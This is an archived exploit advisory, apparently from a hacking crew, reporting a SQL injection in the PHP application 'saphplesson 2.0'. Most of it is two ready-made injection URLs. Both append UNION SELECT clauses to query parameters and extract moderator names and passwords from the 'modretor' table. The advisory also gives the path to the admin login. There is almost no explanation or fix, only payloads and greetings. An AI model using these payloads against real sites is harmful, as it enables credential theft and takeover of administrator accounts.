TUCoPS :: Web :: PHP :: b06-2545.htm

Critical sql injection in saphplesson 2.0
Critical sql injection in saphplesson 2.0
Critical sql injection in saphplesson 2.0


Critical sql injection in : =0D
=0D
forum type : saphplesson 2.0=0D
bug found by : black-code&sweet-devil=0D
team : site-down=0D
type : sql injection=0D
=0D
black-code:=0D
=0D
http://www.xxx.net/sh3r/add.php?forumid=-1%20union%20select%20Modpassword%20from%20modretor=0D 
=0D
sweet-devil:=0D
=0D
http://www.xxx.net/lesons/show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor=0D 
=0D
=0D
path to admin login:=0D
=0D
http://www.xxx.com/pth/admin=0D 
=0D
All my respect to my friend sweet-devil , lezr.com , g123g.net ..=0D
=0D
done .. peace

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH